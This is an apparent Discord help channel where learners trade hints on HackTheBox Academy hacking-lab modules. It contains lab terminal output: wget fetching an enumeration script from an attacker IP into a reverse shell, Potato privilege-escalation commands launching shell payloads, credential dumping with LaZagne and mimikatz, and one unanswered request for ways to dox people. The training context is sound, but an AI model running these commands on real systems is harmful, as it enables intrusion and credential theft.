keen compass
zinc marsh
#

@misty current u there?

steady hawk
zinc marsh
#

but I cannot access anywhere

steady hawk
#

Are you sure?

zinc marsh
steady hawk
#

If you are absolutely sure you've tried everything you can dm if you'd like

fathom pendant
cursive zinc
#

Thanks for the response, I have already solved the problem

fathom pendant
#

Kk :)

opal storm
#

any reason why the activedirectory module isn't installed for the security assessment portion of Active Directory Enumeration and Attacks? I figured it's a little "stealthier" to use that instead of loading powerview onto a machine? just my thought

opal storm
#

yes

zinc marsh
#

because there isn't active directory on that IP

opal storm
#

I guess, but if I'm able to upload powerview and query AD for information, why not use the AD powershell module?

sweet lava
#

Hey guys, I'm having trouble uploading ||Lazagne ||to the machine in Credential Hunting in Linux. I have access to Kira, just need to run ||Lazagne ||as that seems to be the key. Transferred the .||py||, but keep getting "no module found" when I run it. Any tips?

steady hawk
sweet lava
steady hawk
#

Yes, it includes the dependencies for .py

foggy light
#

Module: Using CrackMapExec
Section: Skill Assessment
Question: Gain access to the SQL01 and submit the contents of the flag located in C:\Users\Public\flag.txt.

From Question 1 I found user J***
Then I kerberoasted with that user and found A***. With the new user I didn't find access to anything. Then I checked for MSSQL, checked the msdb database, and didn't find anything interesting.

Can someone point me in a direction?

proud pine
opal storm
proud pine
#

In the sample report, in the 'documentation and reporting' module, there's a finding where they mention that the tester was 'noisy', but undetected. They use this as a finding to suggest that they invest in monitoring tools for the network.

opal storm
foggy light
acoustic owl
acoustic owl
#

If you have completed the module 100%, then yes.

kind turret
#

And you will get to see any updates if there are any.

acoustic owl
blazing crypt
#

Windows Privilege Escalation

Credential Hunting

Search the file system for a file containing a password. Submit the password as your answer.

I've found like 5 passwords, but none seem to work 😅 Any hint?

acoustic owl
blazing crypt
acoustic owl
narrow solar
#

any help here please, I spent 2 days 😅

kind fern
#

Hi, can anyone help me to solve "Password Attacks Lab - Medium"? How do I find dennis' password?

acoustic owl
#

Always bake a || lazagne ||

acoustic owl
misty current
#

Where is it stating in the repository?

blazing crypt
acoustic owl
#

Try it with the user htb-student

blazing crypt
blazing crypt
acoustic owl
misty current
#

I'm just wondering, if I'm the only one who couldn't find the information for each technique in the UACMe.

#

Ah, I found it. Nvm

blazing crypt
misty current
#

You're trying Lazagne from an elevated shell right?

misty current
blazing crypt
blazing crypt
acoustic owl
deep owl
#

hello all, please help if you can ... I don't want to skip the section as I'm stuck for 3 days

#

module : ACTIVE DIRECTORY ENUMERATION & ATTACKS

#

section: Kerberoasting - from Linux

misty current
#

What's your issue?

deep owl
#

when running the kerberoasting attack

#

it asks for a password

#

from the module it says that you would have the password of a domain user

#

but it seems that the user I'm connected as is not part of the domain

#

so when I try the password given to me, which is HTB_@cademy_stdnt!, it does not work

misty current
#

One tip for the AD Enum and Attacks module: keep track of the creds you get from each section, cuz they get reused in later sections without any heads-up.

deep owl
#

thank you so much ... I started this module without taking any notes and it seems like I have to redo it all over again

pine dagger
#

I also wasn't taking notes while doing HTB, and I really regret it now. It's really a good idea to take notes though, even if you never use them again, as it helps cement knowledge, etc. And if you do use them again, it's easy to come back to.

#

It's also super important if you ever need to demonstrate how you did it to a customer (if you're doing pen testing, etc.)

kind fern
foggy light
rustic sage
rapid sparrow
#

I need some help with "Connect via RDP with the Administrator account and submit the flag.txt as your answer." in the module ATTACKING COMMON SERVICES - Attacking RDP

#

I cannot get the hash of administrator acc

rustic sage
#

Does anyone know: when a module is in progress and my plan expires, can I still continue the module or will it lock?

fathom pendant
#

The only modules you keep when silver annual or student expire or run out are the ones you completed

misty current
#

I'm guessing target spawns are only under active subs?

fathom pendant
#

If you own the module you can spawn the target

#

I am not under any subscription, just purchased cubes and went from there. Any module I've purchased I can go back and redo as much as I want

#

I'm assuming it's the same if you've completed it

#

But I know for sure you get to keep the modules you completed under those specific subs

misty current
#

Ah, infinite lab access. Nice PizzaGoose

fathom pendant
#

Would be kinda dumb if you purchased something and couldn't go back to it when you completed it

misty current
#

True, it's just the labs I've seen so far in other platforms/orgs, they don't just give it to you forever. It's always on a sub.

fathom pendant
#

(I was mostly talking shit about those orgs)

misty current
#

Heh

acoustic owl
charred juniper
carmine lark
#

Predictable Reset Token - from Broken authentication
question 1

Create a token on the web application exposed at subdirectory /question1/ using the Create a reset token for htbuser button. Within an interval of +-1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the "Check" button. What is the flag?

Can anyone help me with this question? I've finished the module but am stuck on this question.

I've read the php file that explains that they use the time and convert it to an md5 hash.
I've altered the given.py file to hash every microtime 2s before and after the given time from the target, however I've not landed a hit and have tried multiple different options but to no avail

zenith tulip
#

Hello, I need help with this module https://academy.hackthebox.com/module/39/section/404. I did the whole step by step, but when I run it, the following error appears:

Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created.

I don't know what could be wrong I just started on htb

Question:

Use the Metasploit-Framework to exploit the target with EternalRomance. Find the flag.txt file on Administrator's desktop and submit the contents as the answer.

velvet leaf
#

@charred juniper see below for more details

Slowly I am making progress on the academy.
Now I am at: academy.hackthebox.com module 77 section 853

About: Nibbles - Privilege Escalation

I have reached the point where I have setup a reverse shell and want to download the LinEnum.sh script inside the machine. The reverse shell also was a search to upgrade it but I managed. I have setup a python http.server on the ParrotOS Linux environment. It seems the wget command sees the file but it won’t download. I even tried with base64 to get the script over but unsuccessfully.

See my terminal output below:

nibbler@Nibbles:/tmp$ wget http://10.10.15.57/LinEnum.sh -O /tmp/LinEnum.test
–2023-06-10 12:15:39–
Connecting to 10.10.15.57:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: ‘/tmp/LinEnum.test’

/tmp/LinEnum.test 0%[ ] 0 --.-KB/s in 15m 0s

2023-06-10 12:30:40 (0.00 B/s) - Read error at byte 0/46631 (Connection timed out). Retrying.

–2023-06-10 12:30:41-- (try: 2)
Connecting to 10.10.15.57:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: ‘/tmp/LinEnum.test’

/tmp/LinEnum.test 0%[ ] 0 --.-KB/s

Currently I am setting up a Kali Linux box to see if it will work with another distribution.
In Kali Linux I am unable to upgrade the TTY.
I reach the step to reset the terminal but it won't allow me to do that.

Has anyone come across these issues? And were you able to resolve it? Can you share with me how to resolve this?

brittle umbra
#

In the shells & payloads module (the live engagement), can someone tell me which Metasploit module works on the 3rd host?

vagrant gust
#

how do I access the files in the attack box with xfreerdp

misty current
vagrant gust
#

and I see one that looks like the drive

#

but when I use the credentials saved on the attack box it says incorrect password

vagrant gust
#

mounting the folder worked for me

vital adder
#

this isn't the place for that, if you are new here pls read #rules and #welcome this channel is for hackthebox academy modules

#

although I do recommend CBT Nuggets for that

carmine lark
#

Can anyone assist with Predictable Reset Token - from Broken Authentication, question 1?
I take htbadmin<timestamp in milliseconds>, convert it to an md5 hash and run 1500 milliseconds before and after the timestamp testing out every hash, however I've not gotten the flag yet. Can anyone please assist? This is the last thing I need to finish the module

zinc marsh
#

can I still poison the network with this error?

#

```
[+] Listening for events...
```

misty current
#

It'll still poison other services.

#

except for RDP I guess

#

You'd have to turn off RDP, if you want to poison that too.

#

(most of the time, that's unnecessary)

zinc marsh
#

good to know

gusty gust
#

Heya. I recently started the Pentester Path.
In the "Getting Started" module I have some really strange behaviours.
First I wasn't able to get the initial foothold in the Nibbles Lab by uploading the php-file as I was getting connection timeouts when I sent the POST request.
After it still didn't work after resetting and trying it in incognito mode I went onward to the "Knowledge Check" Section.
Trying to upload the teXXXXX in the thXXX-XXXX.XXX I also get a timeout.
Using the HTB-PWNbox and uploading it makes the page unresponsive and I had to reset the machine...

Navigating the admin section works as intended so I think the connection by itself is working.

blazing crypt
#

Windows Privilege Escalation

Miscellaneous Techniques

Using the techniques in this section, find the cleartext password for an account on the target host.

I got administrator access, dumped the SAM, cracked the hashes, yet the plaintext password doesn't work...

blazing crypt
zinc marsh
#

any hint ?

acoustic owl
open spruce
#

Hi, I'm a little bit lost with this:
Linux fund. 'Task Scheduling'
What is the type of the service of the "syslog.service"?

naive wadi
#

Having issues with this question: "What is the last mailserver returned when querying the MX records for githubapp.com?" in Information Gathering - Web - Skills Assessment.

#

sitting with a list of MX records from ||virus total|| and it won't accept any of them

zinc marsh
rustic sage
#

Question on the DNS module (https://academy.hackthebox.com/module/144/section/1256). Trying to list DNS zones and records and then there's a question for a TXT record, but my dig query to the name server doesn't yield any txt records.

||`└─$ dig @inlanefreight.htb inlanefreight.htb txt

; <<>> DiG 9.18.12-1-Debian <<>> @inlanefreight.htb inlanefreight.htb txt
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 12098
;; flags: qr aa rd; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: 46cb81ebd7e9acd201000000648624c5ed5c62afb84d5519 (good)
;; QUESTION SECTION:
;inlanefreight.htb. IN TXT

;; AUTHORITY SECTION:
inlanefreight.htb. 604800 IN SOA inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800

;; Query time: 20 msec
;; SERVER: 10.129.165.192#53(inlanefreight.htb) (UDP)
;; WHEN: Sun Jun 11 19:47:17 UTC 2023
;; MSG SIZE rcvd: 115||`

oblique bridge
#

HI

carmine lark
#

@rustic sage try doing an AXFR zone transfer. That should give any and all DNS information

rustic sage
# carmine lark try doing an AXFR zone transfer. that should give any and ...

Did that before, but I'm none the wiser from there:

||`└─$ dig @inlanefreight.htb inlanefreight.htb axfr

; <<>> DiG 9.18.12-1-Debian <<>> @inlanefreight.htb inlanefreight.htb axfr
; (1 server found)
;; global options: +cmd
inlanefreight.htb. 604800 IN SOA inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
inlanefreight.htb. 604800 IN NS ns.inlanefreight.htb.
admin.inlanefreight.htb. 604800 IN A 10.10.34.2
ftp.admin.inlanefreight.htb. 604800 IN A 10.10.34.2
careers.inlanefreight.htb. 604800 IN A 10.10.34.50
dc1.inlanefreight.htb. 604800 IN A 10.10.34.16
dc2.inlanefreight.htb. 604800 IN A 10.10.34.11
internal.inlanefreight.htb. 604800 IN A 127.0.0.1
admin.internal.inlanefreight.htb. 604800 IN A 10.10.1.11
wsus.internal.inlanefreight.htb. 604800 IN A 10.10.1.240
ir.inlanefreight.htb. 604800 IN A 10.10.45.5
dev.ir.inlanefreight.htb. 604800 IN A 10.10.45.6
ns.inlanefreight.htb. 604800 IN A 127.0.0.1
resources.inlanefreight.htb. 604800 IN A 10.10.34.100
securemessaging.inlanefreight.htb. 604800 IN A 10.10.34.52
test1.inlanefreight.htb. 604800 IN A 10.10.34.101
us.inlanefreight.htb. 604800 IN A 10.10.200.5
cluster14.us.inlanefreight.htb. 604800 IN A 10.10.200.14
messagecenter.us.inlanefreight.htb. 604800 IN A 10.10.200.10
ww02.inlanefreight.htb. 604800 IN A 10.10.34.112
www1.inlanefreight.htb. 604800 IN A 10.10.34.111
inlanefreight.htb. 604800 IN SOA inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
;; Query time: 16 msec
;; SERVER: 10.129.165.192#53(inlanefreight.htb) (TCP)
;; WHEN: Sun Jun 11 19:59:24 UTC 2023
;; XFR size: 22 records (messages 1, bytes 594)`||

carmine lark
#

use nslookup

rustic sage
# carmine lark use nslookup

ah. I think I now got it even with dig. My (false) thought was that there are two zones in DNS because I was getting two SOA records when doing the zone transfer for the main domain. But I was wrong. I should have instead queried all the subdomains I found, and then I find a second subdomain that is its own zone (i.e., I can do a zone transfer from it) and that one then indeed has a TXT record.

Thanks for pushing me 😉

carmine lark
#

nicely done

pine dagger
pine dagger
#

Huh?

#

Why would you do that?

zinc marsh
#

b* ||is member of ITmanagers||

pine dagger
#

Just ||enumerate the shares using a tool using the credentials you have||.

zinc marsh
#

why was it working with smbclient?

pine dagger
#

When enumerating SMB shares, you're meant to be looking for which shares the account you are using has access to. Then you should examine the shares using a tool to find out what's in the shares you can access. While you can use smbclient, there's another tool that's particularly good at identifying all the files available in shares.

zinc marsh
#

yea I did it with smbmap

#

but I got it to work with smbclient, I must be too tired

misty current
#

The difference between smbmap and smbclient is that smbmap tells you what permissions you have on the share.

pine dagger
# zinc marsh but i got it work with smbclient i must be too tired

Take a break from the computer for a bit. Do something else, like take a shower, watch an episode of a TV show or something. It's something that I find does help me at times when I'm just bashing my face into the brick wall. I'll come back and sometimes solve it in 5 minutes.

#

It's very easy to get focused on the mindset that you should be able to solve this if you just did that one thing differently.

rustic sage
kind fern
#

In "Password Attacks Lab - Hard" I found johanna's password and connected via xfreerdp, so what is the next step I should do?

fathom pendant
#

Look around

#

Perhaps there's a key somewhere you need to pass

zinc marsh
#

with --shares

zinc marsh
#

the permissions are good at least

pine dagger
#

SELECT * FROM TakeABReak;

#

😄

zinc marsh
#

I need to finish it today to do the topology machine tomorrow

pine dagger
#

topology machine?

zinc marsh
pine dagger
#

What's that?

#

A box?

opal storm
#

for security assessment 1 of Active Directory Enumeration and Attacks, to get the second user's password, I know there are many ways of doing this but the module mentions it's somewhere in plaintext. I can keep trying to manually find it, but should one of the tools mentioned in the previous sections about share enumeration find this password?

naive wadi
#

I have the MX records from virus total but they are not being accepted

pine dagger
opal storm
pine dagger
#

I used the powershell method

opal storm
#

what does that mean? manually? with powerview?

pine dagger
#

Manually.

opal storm
#

ok, I'll keep poking around that machine then

#

I've checked a good amount of locations but no luck yet lol

pine dagger
#

Oh sorry. I think from my notes, I used mimikatz 🙂

#

They were a little confusing

opal storm
#

ohhh

#

I see

#

it's not sitting somewhere in plaintext lol

pine dagger
#

Yes. 🙂

#

I used ||mimikatz in powershell via meterpreter||.

#

And sadly @naive wadi, I don't have any notes for that so I can't help you 😦

kind fern
opal storm
fathom pendant
rustic sage
#

bro

#

anybody here

carmine hill
#

Just finished the “deserialization attacks” module. If someone needs help, you can dm me

covert bloom
#

whats a good way to doxx people

kind fern
zinc marsh
rare robin
#

FUCKCKCKCKC

#

WHYY

kind fern
zinc marsh
#

just in case

rare robin
#

its the top gggg

zinc marsh
kind fern
opal storm
#

are we supposed to do port forwarding in order to get the password of the second user in Security Assessment Part 1 - Active Directory Enumeration and Attacks?

zinc marsh
#

just open it lol

kind fern
# zinc marsh and what is the doubt

I found a file with a .kdbx extension, I cracked it with john, in there I found the password for the d*** user but it doesn't work, what should I do?

zinc marsh
opal storm
zinc marsh
opal storm
urban sage
opal storm
#

I'll take a look at that one, I've only used chisel before but I assume they accomplish the same thing

zinc marsh
#

I haven't opened it, not sure what is inside

zinc marsh
urban sage
opal storm
urban sage
zinc marsh
#

rat showed it to me yesterday lol

rustic sage
#

for web shell and shell and also privilege escalation

#

any tools or tips?

zinc marsh
#

```
.\juicypotato -l 9898 -p shell.bat -t *
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 9898
COM -> recv failed with error: 10038
```
#

what is this error?

#

one guy told me this: UPDATE - The command above does work now, it turns out I had the wrong CLSID. Furthermore, with the shell.bat, I am now NT AUTHORITY\SYSTEM, and I finally got the flag.

kind fern
opal storm
# zinc marsh if u have any doubt about the tool ask me

am I understanding this wrong? If we need to port forward the connection from the second machine through the initial machine back to our attack box, don't we need 2 connections on the initial box in order to 1) port forward and 2) get a connection from the second machine onto the first?

zinc marsh
zinc marsh
#

u just need to do the port forward to ur target machine

#

there are 3 machines

#

attacker | pivot | AD

opal storm
#

right

#

but don't we need to get at least a reverse shell or something on the second machine in order to do the next step?

zinc marsh
#

u got the t*y credentials without pivoting?

opal storm
#

no

#

that's what I'm trying to do now

#

and we need to run a certain tool on that machine in order to get the creds is my thought process

zinc marsh
#

u doing all in the webshell?

opal storm
#

no lol I have a meterpreter shell on the first machine/web server

zinc marsh
#

then u just have to do port forwarding

#

from that machine to ur attacker

opal storm
#

I guess I'm confused on how that will allow us to access the second machine?

#

to get tp**y creds

zinc marsh
#

dont u have the creds for ||svc_sql?||

lyric echo
#

Hey y'all! I'm working on the HTTPS/TLS module, but I consistently encounter this error when trying to access the lab URL. Could someone please help?

opal storm
#

which I'm using now to access the machine

lyric echo
# zinc marsh try https://

😖 Thanks! That worked and I also realized why I wasn't able to see the HSTS header. Thanks @zinc marsh !

edgy osprey
#

Hi folks! Would anyone be able to help me figure out the “other flag” in the ping exercise (Using Web Proxies)? I’ve gotten the first flag easily by using ‘cat flag.txt’, but when looking at the other files listed nothing is a text file that can be viewed. I’ve tried changing directories through ‘cd ..’ but nothing stands out. I’ve used the following as well to look at all of the files and still nothing stood out:
‘ls -R /var/www/html;’
I'm completely at a loss for what else to look at. It was interesting the number of files I could see, but nothing "said" second flag to me…
Thanks in advance for any guidance.

zinc marsh
#

```
.\roguepotato.exe -r 172.16.7.240 -e "C:\Users\Public\Downloads\shell.exe"
[+] Starting RoguePotato...
[!] RogueOxidResolver not run locally. Ensure you run it on your remote machine
[*] Creating Pipe Server thread..
[*] Creating TriggerDCOM thread...
[*] Listening on pipe \\.\pipe\RoguePotato\pipe\epmapper, waiting for client to connect
[*] Calling CoGetInstanceFromIStorage with CLSID:{4991d34b-80a1-4291-83b6-3328366b9097}
[*] IStoragetrigger written:106 bytes
[-] Named pipe didn't received any connect request. Exiting ...
```
#

could someone help me

balmy saffron
#

hello, I am at Attacking Common Services - SQL. I cannot connect to the MSSQL server using these commands:
sqsh -S 10.129.74.205 -U htbdbuser -P 'MSSQLAccess01!'
or
sqsh -S 10.129.74.205 -U .\htbdbuser -P 'MSSQLAccess01!'
What am I doing wrong?

#

I did 2 backslashes. Discord removed one.

plain coral
#

What’s the issue?

winged shore
#

I'm stuck in the "WordPress - Discovery & Enumeration" section of the "Attacking Common Applications" module. I actually enumerated the site and found the hidden plugin, however I cannot seem to find the version number. It's not in the source code and I cannot find the readme.txt which the hint alludes to. Can someone nudge me in the right direction?

Edit: as the prophecy foretells, I found the answer right after posting as I'd been looking for an hour 🙂

urban sage
#

Nice job! Glad you figured it out!

rapid sparrow
#

Anyone could help me

Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.

Attacking DNS

acoustic owl
bright solar
#

Hey all, for Broken Authentication - Brute Forcing Cookies, Question 2. I just want to confirm if I am looking at the correct cookie to work on. Currently I get the following within my proxy: 'Cookie: PHPSESSID=op5tvfbvhfu3k806kniubpvsvu'. From other posts though, it appears there is a cookie with HTB in the name, but that does not appear for me. If someone can confirm it would be greatly appreciated it!

foggy light
#

This was a beast!!!

karmic wren
#

Attack Active Directory &ntds.dit. In password attack module. Finding John username and password world rustome wordlist. ??? Any hint to reduce the time.

rustic sage
acoustic owl
acoustic owl
acoustic owl
#

Are you at this question?
Submit the contents of the C:\flag.txt file on MS01.

or at this?
Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.

tawny zealot
#

the latter one, the Administrator's flag

acoustic owl
#

okay, then ||mimikatz on SQL01|| is your friend

#

You should find a Password in Cleartext

pine dagger
pine dagger
acoustic owl
left wren
#

hi

tawny zealot
#

The most likely reason is that I am just doing something completely wrong trying to pass the hash

acoustic owl
#

This Hash should also work

#

You should be able to log in with it.

robust garden
#

Hi folks. I was wondering if there is someone to help me. I'm stuck on one of those questions from Basic toolset.

acoustic owl
tawny zealot
#

Thank you @acoustic owl and @pine dagger !! I finally got it, my mistake was to write the domain into the user parameter of winrm...so mssqlsvc instead of inlanefreight\mssqlsvc and it finally worked 🙂

robust garden
#

The section is Bypass Security Measures - Firewall and IDS/IPS Evasion - Easy Lab. The question is: "Our client wants to know if we can identify which operating system their machine is running on. Submit the OS name as answer."

kind fern
acoustic owl
kind fern
#

It's a .vhd file; I do not know how to crack it?

autumn pilot
#

I'm pretty sure there is an explanation on how to do so

#

in a section on Academy

opal jewel
#

There is an entire article on mounting vhd via linux. Quite simple 😁

acoustic owl
opal jewel
#

Worked like a charm for me

#

That looks to be the same article.

kind fern
#

Thanks a lot it was easy 😆 damn

opal jewel
#

But yes, you can always spin up a windows vm and done👀

kind fern
#

I appreciate it. Thanks a lot.

mossy epoch
rose furnace
#

hello

#

For some reason when I try completing this task: "Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer."

it keeps saying tree connect failed NT_status_bad_network_name whenever I try to log in

rustic sage
rustic sage
#

Solved

frigid patrol
#

Getting Started module, Service Scanning section, question 1: "Perform a Nmap scan of the target. What is the version of the service from the Nmap scan running on port 8080?" What is the answer? I think Apache Tomcat/9.0.31 (Ubuntu), or 9.0.31, or Tomcat/9.0.31

#

I'm stuck, can you help me 😄

edgy osprey
#

Hey @acoustic owl - wondering if you might be able to nudge me in the right direction? I’m on the Repeating Requests module under the web proxy section and stuck on trying to find another flag. I was able to use recursive flag to find all of the directories under /var- however didn’t see any other flag…

west night
#

I find that for some reason the questions are not worded logically in the DNS section of the Footprinting module, especially the first question. I just don't get it!

tawny zealot
buoyant escarp
silk glade
#

Hi all, I am currently on Attacking Common Services - Easy lab. I got the flag, but it says there are 2 ways to get it. Can someone help me to get the other method?

acoustic owl
acoustic owl
cinder mortar
#

For report writing for the exam, are we expected to record down EVERY finding even if it leads to a dead end, or just every finding that contributes to the attack path will suffice?

west night
#

@acoustic owl It says to "Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain." From the commands given in the module I am not sure how to do that. You typically require both an ip address and an FQDN in order to perform the dig command.

gaunt monolith
#

Hi, I need help on the Shell & Payloads module in the live engagement section. Actually, when enumerating the target I have a Tomcat service on port 8080. I need to exploit it using msfvenom; I created a war file but I don't have any idea how to deliver my file because I don't have a browser to interact with. So I think I can use msfconsole; after searching I used the exploit multi/handler but it doesn't work 😕 Any hint, or am I on the wrong road?

zinc marsh
west night
#

@acoustic owl I just keep getting the SOA section which shows the root servers, but this is not the correct answer and does not result in finding the "inlanefreight.htb" domain. The question is ambiguous and vague. It does not matter how many times I read the question or the module content for guidance; I am just unsure how to approach this question. Thanks for your assistance 🙂

edgy osprey
#

I’ve also used the search function when I ls -R /var/www/html to see if there is any other file by the same name but no luck

#

Thanks for the tip @tawny zealot ! I’m new to this field, maybe I’m just doing something wrong.

tawny zealot
acoustic owl
acoustic owl
edgy osprey
worldly stump
#

Hello guys, sorry for the question, and I do not know if someone else already asked it. By any chance, do any of you have any kind of learning path to follow to be able to do the fundamentals modules in their respective order? I want to help my brother to start from scratch, but to be honest, in my case I followed the modules randomly and I do not have any idea where we can start from, just the fundamentals modules. We will really appreciate any insights about it.

west night
#

@acoustic owl Have I understood FQDN correctly? After reading the module material many times, this is what I think an FQDN is:
[hostname].[subdomain].[domain].[topleveldomain].
My gut reaction to "Searched is the FQDN of the NameServer" is that I should try .com instead of htb and see if this changes the output.

acoustic owl
#

No, you don't have to do anything with com.
Only htb

#

A fully qualified domain name (FQDN), sometimes also referred to as an absolute domain name, is a domain name that specifies its exact location in the tree hierarchy of the Domain Name System (DNS). It specifies all domain levels, including the top-level domain and the root zone. A fully qualified domain name is distinguished by its lack of ambi...

acoustic owl
worldly stump
#

@acoustic owl wonderful, thanks! much appreciated!

tawny zealot
gaunt monolith
tawny zealot
gaunt monolith
#

I think I can use curl or wget, but it still doesn't work

tawny zealot
gaunt monolith
#

Ya, I'm in RDP but I can't see where the browser is

edgy osprey
tawny zealot
gaunt monolith
naive field
#

Can I get some help on AD Assessment part 1? I've RDPed to the MS01 host and got the flag. Now I'm kinda lost on how to find this cleartext password. I tried looking manually and then ran winPEAS but nothing....

zinc marsh
#

I have the hash but I'm not able to pass the hash or crack it

#

I got the credentials for the next questions, not the flag for that one

supple patio
#

Just type firefox in the terminal

analog dock
#

Question 2 in the live engagement, shells & payloads module, I managed to get a webshell but for some reason most commands are not working

#

Whoami and hostname work, but I can't ls/dir or anything

zinc marsh
#

It is not an interactive shell then

misty current
#

It shows the same for dir?

#

if it's getting executed in cmd, ls won't work.

analog dock
misty current
#

What web-shell are you using?

#

Try with a simple PHP one-liner

analog dock
#

The one from laudanum

#

Needed to be a war file

zinc marsh
misty current
#

Just see if war webshells from other repo work.

real compass
# cursive zinc Which however does not work

Hey, did you end up figuring out what's wrong? Cos I've tried literally everything on this exact problem in this module, legit been stuck on it for like 3 hours and got absolutely nowhere. I cracked the initial one but can't seem to get the password for Skills Assessment 1 on Login Brute Forcing.
@cursive zinc